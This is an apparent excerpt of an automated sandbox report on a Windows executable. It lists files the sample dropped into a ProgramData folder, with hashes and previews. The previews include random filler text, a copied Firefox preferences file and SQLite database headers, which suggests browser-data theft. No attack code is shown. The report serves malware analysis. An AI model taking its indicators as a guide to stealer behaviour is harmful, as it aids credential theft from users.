                                                                                                                                                                                                                                                SHA-512:025DD100D154272973EE45633F7B610C4A7700540774ABA784304762E45FE9CD57F767855F2EB1A2318317FBDF771D15B98E1F02AD06DDE294B3FD7F5375D439
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="634031" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                                                                                                                                                                                                C:\ProgramData\PP89HLXLFCBI\6XTRIW

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\dZKPE9gotO.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1026
                                                                                                                                                                                                                                                Entropy (8bit):4.691266297898928
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:VFl0HyrVqOHKWeRhsGhMtSCTPacJ7pZeZLF8M7y+b:VFl0HyrVqOqNRhHkTaW73Q58yy+b
                                                                                                                                                                                                                                                MD5:7D4E714F4EDA4631DCA8D420338392F1
                                                                                                                                                                                                                                                SHA1:536B4BCBAB5C780738EE2D562D16AB532C9D8E68
                                                                                                                                                                                                                                                SHA-256:841F74A72A1D21F63E4039906E93A4FD9E70EC517385DDEE855033A9A17FE94A
                                                                                                                                                                                                                                                SHA-512:FEB2EEC88720FF040794CD273A7B4A07DD5AC1E6CD9A9235A098F1FB3A1C50385B37E376764C927978961A0EE4AC1C591F197494D82D71B35EAA3780956CB1A3
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:AQRFEVRTGLRPNVUMAMHTYETEVGDENHEHZDAQRXZQCDHHLTUZIEJRCQGGPRQWBIYWADWJEZTAELERKZUDZJHSFVIUPBTJVGKYQFWVMPTQUZUZZSOJNBOABYGRCYMPSQARVQUZQVCNVECXPCBIEBYWXWSRMTKFKBEHRJGIPFMOYSZMEELAQPGBHDTUPVXJROQBNFXLTFTPQHVAGKBRLNHZRZVUTEGANMGKVRFJJNOMKLVMQNTHIORPQCPGNIZSOYKXAQJCOPIGBQRJINVPIRVOHHCOGWQPXWQEGDKAHJASRIJBIMZDOWPSCSZZQNZFPNLCIRCXKLGBVXKUJASQXRHFULXFGHARZKMVRSMXPJPUDKEQXOSCEBAKVRLNKSSEVKXVMESKRHMKSXSUKELGCEYTRDUXROEARVKPGFZHNSDRPAQVQVSCJPHBVIRZPYJKRBBZNOUQWXJMMJNDFWGGJPGQMMWRHVVMGZTXMHGJMPQFKEKIAULKOFHNCPDGWVUWIVKGZHFAQVQOBPOUZZTMTUXLURTPHPWRVYABSKGEOJTHCTJYEQSHAVPELOSNLRXFRVWMHJRZTZLGKGNKELBIANUAYANWKNNJPQUXDOBXLYTGIGYZMXXBSVTKCOWSZHFODTFONXVLBRUGJKEZMTIRWSGAANCFOWQHTMLCODGMRHITYHVPOCCXAYGLOXHITQDUATUBKLPLHFHTHTEONDGTWZOQVYRUABLZCNSDXFSTUTQJACVNWWCLMGVDGIDXECYLUJKBUKWQQUERSQSLBAKCXGRYMXSMUPSLSRDICMSQOGBWCATEAACXPGZFMXCSVNIZUQRAQEWTFWYKNKMGGMAZDJHXXORIHLHSPMGKAWZUQOKTRGEGDEPETKDTOVQKFNIASUNQNVNPECXIFOSOXOYCRVRJAKLVRMRCMTVZUHFLJPYFXCUSTATJHRIINTHARIAPEKFSUPRLIGJHIMRLJERLFFTZAQPSMLNNQSZLYNDGBIYC

                                                                                                                                                                                                                                                C:\ProgramData\PP89HLXLFCBI\AI58QQ

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\dZKPE9gotO.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1026
                                                                                                                                                                                                                                                Entropy (8bit):4.698999446679606
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:W9l1TKf/7G6pHxojyPqnhSz0hujim56BAhI8QR9QlFpd:6l1uFqyP5zY5moAoah
                                                                                                                                                                                                                                                MD5:73351F70BFEF33BEEA9E1CC192801D02
                                                                                                                                                                                                                                                SHA1:ACFD9C2DFA1B38FAB53EEB4730B0DF0551B45D8C
                                                                                                                                                                                                                                                SHA-256:F6917A805A90AC72064D294E5E0FBA4604588F7B0EB2B3A3511D1FC6887E3E24
                                                                                                                                                                                                                                                SHA-512:56D46FF29F86F3B314EBC6CC456A1D153D0F1245A926F82AE7FA9A6A5AD792094FEDBB5FC489929186C8A72732BE4EAFF3BCF2E508B8B2FC50B013E6166B212C
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:UNKRLCVOHVAXPHOHAZYDIMBTYYPLYBYVUEQLGGJJCFCITCEMGOMMPTCXLGLYUZHZWMTUNUOFUUYAUDMSGBWJKAMIFUAYTDIKVYQPGYQSIZTANWSUNZDHBRNONSOUWVUJZFBPOZIMZOUPVAYJKSJULUHYRYUUOLYWEWFCYAZHMJKHXUZLTHEXFDNRXIUQOZHGGMDFHSXAJKHPBRPJJKVVXGMDIMEMMFXEOBQJSMYSSMPVSVUNJLJSSMEFHHLFEVPWZDDEIKQGOJPOJWTWMNPIEQXWXOBLNLDRNRUGDUXCMTURFAWMSSYAENGRWRBIJOYJNUMDYXNDETRQMYAMGJYZKZQPFPCONTLPPRLYMQJPIWCAXNOLGZOTNQEWQGBVSNORDVIXIUJAENWBXHSXSDNAMBAXUDBRCRHHYFJQLZEAGFZJUFMBIUBABNXVYITYPKRJUMGDPPABWBKNLHDKPLRUIRQXXKLFZAHHOQZHNTUNORTHIPKRZRDGRVPKIZRHYAGOVNDISDQRFXONCHILLZJTGXRZPEIPHKZXDBODDSUZIKNUVTNMZGVZQILJHRYJYZKDBLCLJFWSXRREYFFMEXBICHNCCTBTTTTZZVMSHPBKJMXPXFJNIDQFSJDMCXXUZPFVBFVKYCVFVQFUVOJWWIUNBICQVZGOZZVDJKKZTGDLWXADCBHYGUDWYWTYVYOOICLDGZXJHSTPFGQBMRCCCBJSXCPVVBKRNYTLTAOWPNJFKXUXQORRVHCHMSRAHQHFDEMZUFOFJOQFXHQBLWKNHXKEBLUJMQCFCSTBVXKUUPPXZNEWBUZPPVJFCDLXJEGEZSQSHHBNUCTRMEDMGPNZBHGEXVTWWZFELEFQQWXGHSVDMBAGZANSOHWAGHWRFCVNRSBOOZFJQONOYPNXBMHJINMGSGLMUSTAOMZXKOIHFYYSJWELBRBKMJUVQKVVFUFLDZKJVPCATVIHCISAYNPTMBEUQYJRYFUSBKOSITLVDUTJ

                                                                                                                                                                                                                                                C:\ProgramData\PP89HLXLFCBI\AIWTJM

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\dZKPE9gotO.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (1769), with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):9370
                                                                                                                                                                                                                                                Entropy (8bit):5.514140640374404
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:192:lLnSRkPYbBp6tqUCaXr6V6kHNBw8D3nSl:NeqqUWpPwK0
                                                                                                                                                                                                                                                MD5:7E44458E0A8A3A7D10875BC3B7AE72D1
                                                                                                                                                                                                                                                SHA1:E5E6AC8676EE3761DAB13A10EB7573C19F48D297
                                                                                                                                                                                                                                                SHA-256:21A04E176A9CEBDA60AE6FD82A7495C6E0867ED02B8009A44DDC9863E14D8753
                                                                                                                                                                                                                                                SHA-512:012ED6CDC0802AA1063EFE841549341CC86EB626A26FC4BDC509598D8E33093296510344A2CC4419B007F6191F3445DA8F0AAE3B1626E54C1EF66DDDF3FA59B1
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "27fb6245-bd08-4de6-8f4d-2ece3f597752");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696491690);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696491694);..user_pref("app.update.lastUpdateTime.xpi-signature-verification

                                                                                                                                                                                                                                                C:\ProgramData\PP89HLXLFCBI\CB1DTR

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\dZKPE9gotO.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1026
                                                                                                                                                                                                                                                Entropy (8bit):4.694574194309462
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:57msLju1di6quBsK4eI3+RkAjyMKtB/kS0G1:gmjuC1uBsNeAokAUB/GE
                                                                                                                                                                                                                                                MD5:78801AF1375CDD81ED0CC275FE562870
                                                                                                                                                                                                                                                SHA1:8ED80B60849A4665F11E20DE225B9ACB1F88D5A9
                                                                                                                                                                                                                                                SHA-256:44BF2D71E854D09660542648F4B41BC00C70ABA36B4C8FD76F9A8D8AB23B5276
                                                                                                                                                                                                                                                SHA-512:E20D16EC40FEF1A83DB1FC39A84B691870C30590FC70CA38CC83A8F08C08F626E3136ADBF3B731F85E5768561C8829C42DF3B97C726191FEF3859272A03E99E0
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:NIRMEKAMZHIQPCHHYDLDLONNDCJFTRECXCDYNWSMACINEWVUDRAWELIDKGUGOSLGTIKNJSPGIFRTNFPWDBIHISPKHOBWBMPRCMOQQAVOUVQODKWHOMRFLDKYATGCKZVKRHTCMHJJGYWRTELTQOLJXKPKLCWLNKOQBPNOJHARBPHMNOZRAICCUCIEHOFBKAUBHQNVPQAWMIZZGYXPDVFFYAGVHCILYWHPIYXMHCXNZJBHOBSYJEJJTXWKIBAQBZGNDHAWRNDJBFGUEFMOHHHXTBQHMIBGPLFFGAEFCSIDIGIIDPUHNETSAWPCSJJCDZPMLCWGKVYJOMJWFUXHEQSIPJDTRUPSCBCTYFLTMLRFJUXIBNGXSREQTWHFPIDSKBRTLLRUTFDXFIDFUXMZCFABRMLSHWFSZTZUJRPKXKHBWYAPJLBFVPDCCGSQYVSJDWWNYUXGFFAMCEWZRCITRTQVISLFKGNMRYVUJTQWJUFSLPGOANDHPJXZJWSWQJJZLPACFDBTCFPQMXOVHIOAMCIQCTLIBSRXETYYSVLPHVURWFAJBQPHFKWZOFSUIKXWOHPOJGFCCQGRXFMTCKHSWJPWBLFTLVERFEAFHASTRMUQSDEUNXGDSWWTOQTUBAZVNLXDRFCZWKUVIGVXHTLERNSTFJCPGLHSIFYNUWMACSMFBHFDCZSOPZRKQGTETMPYNUQPOTCKDJQXQUUMEWVKVIEYDAEXLRTMQQSTAVCIBCOSHDMRFFHIAQDBBMBEOMTPGHKJIAYMKMTMXYUVORUJUGSHEHFCYZUALULRJGKXINMJWUWMPZOJOUMUEFFWCKOWNLIEVQWZPJMTQVIEDAFICXPPSUGBPZSMHDQOIXNDWLCSVZUHTSHAPPFDAEETYFLSNJFPXRPZYQLZLSJQALWIOEGAOFDHHNAOIWCTFHXKZJROQRTVBGVHJKRUCGBHKRLCZODATMBGLOISTFOETTXPJOPGPPJYNFXWQFALNGZLGZVJ

                                                                                                                                                                                                                                                C:\ProgramData\PP89HLXLFCBI\I58QQQ

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\dZKPE9gotO.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1026
                                                                                                                                                                                                                                                Entropy (8bit):4.691266297898928
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:VFl0HyrVqOHKWeRhsGhMtSCTPacJ7pZeZLF8M7y+b:VFl0HyrVqOqNRhHkTaW73Q58yy+b
                                                                                                                                                                                                                                                MD5:7D4E714F4EDA4631DCA8D420338392F1
                                                                                                                                                                                                                                                SHA1:536B4BCBAB5C780738EE2D562D16AB532C9D8E68
                                                                                                                                                                                                                                                SHA-256:841F74A72A1D21F63E4039906E93A4FD9E70EC517385DDEE855033A9A17FE94A
                                                                                                                                                                                                                                                SHA-512:FEB2EEC88720FF040794CD273A7B4A07DD5AC1E6CD9A9235A098F1FB3A1C50385B37E376764C927978961A0EE4AC1C591F197494D82D71B35EAA3780956CB1A3
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:AQRFEVRTGLRPNVUMAMHTYETEVGDENHEHZDAQRXZQCDHHLTUZIEJRCQGGPRQWBIYWADWJEZTAELERKZUDZJHSFVIUPBTJVGKYQFWVMPTQUZUZZSOJNBOABYGRCYMPSQARVQUZQVCNVECXPCBIEBYWXWSRMTKFKBEHRJGIPFMOYSZMEELAQPGBHDTUPVXJROQBNFXLTFTPQHVAGKBRLNHZRZVUTEGANMGKVRFJJNOMKLVMQNTHIORPQCPGNIZSOYKXAQJCOPIGBQRJINVPIRVOHHCOGWQPXWQEGDKAHJASRIJBIMZDOWPSCSZZQNZFPNLCIRCXKLGBVXKUJASQXRHFULXFGHARZKMVRSMXPJPUDKEQXOSCEBAKVRLNKSSEVKXVMESKRHMKSXSUKELGCEYTRDUXROEARVKPGFZHNSDRPAQVQVSCJPHBVIRZPYJKRBBZNOUQWXJMMJNDFWGGJPGQMMWRHVVMGZTXMHGJMPQFKEKIAULKOFHNCPDGWVUWIVKGZHFAQVQOBPOUZZTMTUXLURTPHPWRVYABSKGEOJTHCTJYEQSHAVPELOSNLRXFRVWMHJRZTZLGKGNKELBIANUAYANWKNNJPQUXDOBXLYTGIGYZMXXBSVTKCOWSZHFODTFONXVLBRUGJKEZMTIRWSGAANCFOWQHTMLCODGMRHITYHVPOCCXAYGLOXHITQDUATUBKLPLHFHTHTEONDGTWZOQVYRUABLZCNSDXFSTUTQJACVNWWCLMGVDGIDXECYLUJKBUKWQQUERSQSLBAKCXGRYMXSMUPSLSRDICMSQOGBWCATEAACXPGZFMXCSVNIZUQRAQEWTFWYKNKMGGMAZDJHXXORIHLHSPMGKAWZUQOKTRGEGDEPETKDTOVQKFNIASUNQNVNPECXIFOSOXOYCRVRJAKLVRMRCMTVZUHFLJPYFXCUSTATJHRIINTHARIAPEKFSUPRLIGJHIMRLJERLFFTZAQPSMLNNQSZLYNDGBIYC

                                                                                                                                                                                                                                                C:\ProgramData\PP89HLXLFCBI\KXLFU3OHD

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\dZKPE9gotO.exe
                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):51200
                                                                                                                                                                                                                                                Entropy (8bit):0.8746135976761988
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                                                                                                                                                                                                MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                                                                                                                                                                                                SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                                                                                                                                                                                                SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                                                                                                                                                                                                SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                C:\ProgramData\PP89HLXLFCBI\L68Y5X

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\dZKPE9gotO.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1026
                                                                                                                                                                                                                                                Entropy (8bit):4.694574194309462
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:57msLju1di6quBsK4eI3+RkAjyMKtB/kS0G1:gmjuC1uBsNeAokAUB/GE
                                                                                                                                                                                                                                                MD5:78801AF1375CDD81ED0CC275FE562870
                                                                                                                                                                                                                                                SHA1:8ED80B60849A4665F11E20DE225B9ACB1F88D5A9
                                                                                                                                                                                                                                                SHA-256:44BF2D71E854D09660542648F4B41BC00C70ABA36B4C8FD76F9A8D8AB23B5276
                                                                                                                                                                                                                                                SHA-512:E20D16EC40FEF1A83DB1FC39A84B691870C30590FC70CA38CC83A8F08C08F626E3136ADBF3B731F85E5768561C8829C42DF3B97C726191FEF3859272A03E99E0
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:NIRMEKAMZHIQPCHHYDLDLONNDCJFTRECXCDYNWSMACINEWVUDRAWELIDKGUGOSLGTIKNJSPGIFRTNFPWDBIHISPKHOBWBMPRCMOQQAVOUVQODKWHOMRFLDKYATGCKZVKRHTCMHJJGYWRTELTQOLJXKPKLCWLNKOQBPNOJHARBPHMNOZRAICCUCIEHOFBKAUBHQNVPQAWMIZZGYXPDVFFYAGVHCILYWHPIYXMHCXNZJBHOBSYJEJJTXWKIBAQBZGNDHAWRNDJBFGUEFMOHHHXTBQHMIBGPLFFGAEFCSIDIGIIDPUHNETSAWPCSJJCDZPMLCWGKVYJOMJWFUXHEQSIPJDTRUPSCBCTYFLTMLRFJUXIBNGXSREQTWHFPIDSKBRTLLRUTFDXFIDFUXMZCFABRMLSHWFSZTZUJRPKXKHBWYAPJLBFVPDCCGSQYVSJDWWNYUXGFFAMCEWZRCITRTQVISLFKGNMRYVUJTQWJUFSLPGOANDHPJXZJWSWQJJZLPACFDBTCFPQMXOVHIOAMCIQCTLIBSRXETYYSVLPHVURWFAJBQPHFKWZOFSUIKXWOHPOJGFCCQGRXFMTCKHSWJPWBLFTLVERFEAFHASTRMUQSDEUNXGDSWWTOQTUBAZVNLXDRFCZWKUVIGVXHTLERNSTFJCPGLHSIFYNUWMACSMFBHFDCZSOPZRKQGTETMPYNUQPOTCKDJQXQUUMEWVKVIEYDAEXLRTMQQSTAVCIBCOSHDMRFFHIAQDBBMBEOMTPGHKJIAYMKMTMXYUVORUJUGSHEHFCYZUALULRJGKXINMJWUWMPZOJOUMUEFFWCKOWNLIEVQWZPJMTQVIEDAFICXPPSUGBPZSMHDQOIXNDWLCSVZUHTSHAPPFDAEETYFLSNJFPXRPZYQLZLSJQALWIOEGAOFDHHNAOIWCTFHXKZJROQRTVBGVHJKRUCGBHKRLCZODATMBGLOISTFOETTXPJOPGPPJYNFXWQFALNGZLGZVJ

                                                                                                                                                                                                                                                C:\ProgramData\PP89HLXLFCBI\L6XTRQ

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\dZKPE9gotO.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1026
                                                                                                                                                                                                                                                Entropy (8bit):4.691179545447335
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:tlYQ6oxCx5XYY3KvUEOIA65F7dAeIQGhrMerXo:rxy5avIgDIQQrMQXo
                                                                                                                                                                                                                                                MD5:70ED9F89ADEE0C43C2C82F30F075991E
                                                                                                                                                                                                                                                SHA1:0E75067F3EEBF7D577813A06A0A6A2FA9640A04F
                                                                                                                                                                                                                                                SHA-256:4CCB14AF416B302962BC020D9E436FCA0B32B56F37932B2CA7D078355282CF80
                                                                                                                                                                                                                                                SHA-512:A75A2B3BE722735CE45B93CB1522F31D884BA8BE30A122BFCE7E50720773B0B5B48F163BB9FF0239015430BEADD61DAD76F13EA6CC027C5A4AB4B842EED468CB
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:HQJBRDYKDEOHXEMHQUWMHZKQTIUMQUJZQSHSNBAZYZJDQYWUPMZFOTGKPEFSZCMKVLFONSCAAMYVGLIHZYOTOPUUVQOBDOLNPVUWURWNEXALCBEMRUAMWIVXUEMKBDPTQDMNCZDHIBPXPQNVVBSEAMAZGUFIOXJXUMQDPOKVVJUQBWZVZRBRPTZPVEJYLPIYMEAMWWDBNMSHJABGSBWULRADLUGOSJMUMMAMATXWORDUBFFRKPJOGISDLVVWVEVKTCLPSYFZVEZUCAYZDFGQESZIGEIJSPECVLABTLKSYGZSZGOCSOVUTVVPDTKMXTQIDAXVAJZEADSIEJVOWEHIMAOXMXIYKZIBMQKEOKXDOHFZWHLAGEWJECAZGRNZINNBMFSXKSHESCTAUQMEPBTLUPWEJFSFLHXHTECHZUUDFJOGDDWIRGOWPPKFZEUJYTJMHKZKHJNTGRKLLEAGPHTTOOTTMGEBMEHXZJPZXSVAQMYTVIDQEYRXIAPROXUHUUXYGMHCRUUYFQOWDUPJKUNGSADHWGBZUQMPTWLBUXNFUJGXUJHMMUUHZIKPUPRZVXNDGTJDDXIMANOVZFNWWEHJHXRQXSYDNXTPEXJZNKPPCJBVRMLFMRIEWFPGJGVBHZKCGUUQFRCXDGAPMAVRPRODGVOWMFUTKARIMTYBKFAHZMPYXRSLUFTYOWQDSLXVKMYYISNNZDBQEVANDLZJURRLNHZBMEVGPOIXUCEKJTTUZSEQSNPEEYVXCUAWHUWEFITOITMDHBLUWCIANEGYREWEOVBZRHQTHBYYPFCKKGLXQPBHRRMJUHMZXPSZSYQISKTCKOCWTTRZHBQSMTMNCYCQKIGYNDYWGUIVILQUURMKJKQBBDUZOINKPJRQEGWTTZOFXCCZXUCHKCWUSBTKAOSTDEHMZTFHPRMNWUWUKXNTZRKJRQLXXQCEGZPAHKOBVMNQQIYGWKFTHIVTFKISEBNGTEJIXPIRDTAGJZNJKNLM

                                                                                                                                                                                                                                                C:\ProgramData\PP89HLXLFCBI\NGVAAA

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\dZKPE9gotO.exe
                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):159744
                                                                                                                                                                                                                                                Entropy (8bit):0.5394293526345721
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:96:AquejzH+bF+UIYysX0IxQzh/tsV0NifLjLqLy0e9S8E:AqtH+bF+UI3iN0RSV0k3qLyj9
                                                                                                                                                                                                                                                MD5:52701A76A821CDDBC23FB25C3FCA4968
                                                                                                                                                                                                                                                SHA1:440D4B5A38AF50711C5E6C6BE22D80BC17BF32DE
                                                                                                                                                                                                                                                SHA-256:D602B4D0B3EB9B51535F6EBA33709DCB881237FA95C5072CB39CECF0E06A0AC4
                                                                                                                                                                                                                                                SHA-512:2653C8DB9C20207FA7006BC9C63142B7C356FB9DC97F9184D60C75D987DC0848A8159C239E83E2FC9D45C522FEAE8D273CDCD31183DED91B8B587596183FC000
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                C:\ProgramData\PP89HLXLFCBI\NGVKFK

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\dZKPE9gotO.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1026
                                                                                                                                                                                                                                                Entropy (8bit):4.698999446679606
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:W9l1TKf/7G6pHxojyPqnhSz0hujim56BAhI8QR9QlFpd:6l1uFqyP5zY5moAoah
                                                                                                                                                                                                                                                MD5:73351F70BFEF33BEEA9E1CC192801D02
                                                                                                                                                                                                                                                SHA1:ACFD9C2DFA1B38FAB53EEB4730B0DF0551B45D8C
                                                                                                                                                                                                                                                SHA-256:F6917A805A90AC72064D294E5E0FBA4604588F7B0EB2B3A3511D1FC6887E3E24
                                                                                                                                                                                                                                                SHA-512:56D46FF29F86F3B314EBC6CC456A1D153D0F1245A926F82AE7FA9A6A5AD792094FEDBB5FC489929186C8A72732BE4EAFF3BCF2E508B8B2FC50B013E6166B212C
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:UNKRLCVOHVAXPHOHAZYDIMBTYYPLYBYVUEQLGGJJCFCITCEMGOMMPTCXLGLYUZHZWMTUNUOFUUYAUDMSGBWJKAMIFUAYTDIKVYQPGYQSIZTANWSUNZDHBRNONSOUWVUJZFBPOZIMZOUPVAYJKSJULUHYRYUUOLYWEWFCYAZHMJKHXUZLTHEXFDNRXIUQOZHGGMDFHSXAJKHPBRPJJKVVXGMDIMEMMFXEOBQJSMYSSMPVSVUNJLJSSMEFHHLFEVPWZDDEIKQGOJPOJWTWMNPIEQXWXOBLNLDRNRUGDUXCMTURFAWMSSYAENGRWRBIJOYJNUMDYXNDETRQMYAMGJYZKZQPFPCONTLPPRLYMQJPIWCAXNOLGZOTNQEWQGBVSNORDVIXIUJAENWBXHSXSDNAMBAXUDBRCRHHYFJQLZEAGFZJUFMBIUBABNXVYITYPKRJUMGDPPABWBKNLHDKPLRUIRQXXKLFZAHHOQZHNTUNORTHIPKRZRDGRVPKIZRHYAGOVNDISDQRFXONCHILLZJTGXRZPEIPHKZXDBODDSUZIKNUVTNMZGVZQILJHRYJYZKDBLCLJFWSXRREYFFMEXBICHNCCTBTTTTZZVMSHPBKJMXPXFJNIDQFSJDMCXXUZPFVBFVKYCVFVQFUVOJWWIUNBICQVZGOZZVDJKKZTGDLWXADCBHYGUDWYWTYVYOOICLDGZXJHSTPFGQBMRCCCBJSXCPVVBKRNYTLTAOWPNJFKXUXQORRVHCHMSRAHQHFDEMZUFOFJOQFXHQBLWKNHXKEBLUJMQCFCSTBVXKUUPPXZNEWBUZPPVJFCDLXJEGEZSQSHHBNUCTRMEDMGPNZBHGEXVTWWZFELEFQQWXGHSVDMBAGZANSOHWAGHWRFCVNRSBOOZFJQONOYPNXBMHJINMGSGLMUSTAOMZXKOIHFYYSJWELBRBKMJUVQKVVFUFLDZKJVPCATVIHCISAYNPTMBEUQYJRYFUSBKOSITLVDUTJ

                                                                                                                                                                                                                                                C:\ProgramData\PP89HLXLFCBI\O8Q168

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\dZKPE9gotO.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1026
                                                                                                                                                                                                                                                Entropy (8bit):4.701796197804446
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:C1U2g6pCwYBq9+pGzEcrz023TZ9iFxwELi:2U2gCCm9drz0wTZsIEe
                                                                                                                                                                                                                                                MD5:C8350CE91F4E8E8B04269B5F3C6148DA
                                                                                                                                                                                                                                                SHA1:22D523A327EBAF8616488087E2DCE9DBD857F0CC
                                                                                                                                                                                                                                                SHA-256:1BE0B3682C4F3A3315465E66A2C7C357BB06225947C526B1B89A39D9D120AFBF
                                                                                                                                                                                                                                                SHA-512:C4891D35B6E895E4A9F4A785701EFFA4305AE88D09D309865F9312D95C296CB417916D8CBA461099E80F68C5AE5015A1172E60319256A453DE81445660F55806
                                                                                                                                                                                                                                                Malicious:false
